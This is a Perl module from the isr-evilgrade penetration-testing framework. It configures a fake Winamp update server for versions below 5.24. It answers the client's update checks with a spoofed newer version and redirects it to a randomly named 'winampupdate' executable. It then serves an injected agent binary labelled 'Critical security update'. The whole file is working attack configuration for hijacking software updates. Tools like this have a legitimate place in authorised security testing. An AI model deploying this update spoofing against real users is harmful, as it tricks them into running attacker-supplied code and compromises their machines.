###############
# winamp.pm
#
# Copyright 2007 Francisco Amato
#
# This file is part of isr-evilgrade, www.infobyte.com.ar .
#
# isr-evilgrade is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation version 2 of the License.
#
# isr-evilgrade is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with w3af; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
#
# '''
##
package modules::winamp;

use strict;
use Data::Dump qw(dump);

use isrcore::utils;

my $base=
{
    'name' => 'Winamp',
    'version' => '1.0',
    'appver'  => '< 5.24',
    'author' => [ 'Francisco Amato < famato +[AT]+ infobyte.com.ar>' ],
    'description' => qq{},    
    'vh' => '(www.winamp.com|client.winamp.com)',
    'request' => [
		    {
		    'req' => '/update/latest-version.php', #regex friendly
		    'type' => 'string', #file|string|agent|install
		    'method' => '', #any
		    'bin'    => 0,
		    'string' => "<%VERSION%>\r\n<%URL%>\r\n",
		    'parse' => 1,
		    'file' => '',
		    },
		    {
		    'req' => '/getfile', #regex friendly
		    'type' => 'string', #file|string|agent|install
		    'method' => '', #any
		    'bin'    => 0,
		    'string' => '<html><script>window.location="http://www.winamp.com/winampupdate<%RND1%>.exe"</script><%DESCRIPTION%></html>',
		    'parse' => 1,
		    'file' => '',
		    },
		    {
		    'req' => '/update/client_session.php', #regex friendly
		    'type' => 'string', #file|string|agent|install
		    'method' => '', #any
		    'bin'    => 0,
		    'string' => '',
		    'parse' => 0,
		    'file' => '',
		    },

		    {
		    'req' => '.exe', #regex friendly
		    'type' => 'agent', #file|string|agent|install
		    'method' => '', #any
		    'bin'    => 1,		    
		    'string' => '',
		    'parse' => 0,
		    'file' => ''
		    },

    ],
    #Options		    
    'options' => {  'agent'  => { 'val' => './agent/agent.exe', 'desc' => 'Agent to inject'},
		    'enable' => { 'val' => 1, 
			    	  'desc' => 'Status'},
		    'description'  => { 'val' => 'Critical security update, processing update..',
			    	  'desc' => 'Description display in the update'},
                    'version'  => { 'val' => "'9.'.isrcore::utils::RndNum(3)",#'val' => '\'30.\'.isrcore::utils::RndNum(1).\'.\'.isrcore::utils::RndNum(4).\'.\'.isrcore::utils::RndNum(1)',
                                  'hidden' => 1,
                                'dynamic' =>1,
				},
                    'url'  => { 'val' => "'http://www.winamp.com/getfile'.isrcore::utils::RndAlpha(10).'.html'",
                                'hidden' => 1,
                                'dynamic' =>1,
                            },			    	  				
                    'rnd1'  => {  'val' => 'isrcore::utils::RndNum(5)',
                                  'hidden' => 1,
                            	  'dynamic' =>1,
                            },			    	  
		 }
};


##########################################################################
# FUNCTION      new
# RECEIVES
# RETURNS
# EXPECTS
# DOES          class's constructor
sub new {
    my $class = shift;
    my $self = { 'Base' => $base, @_ };
    return bless $self, $class;
}
1;
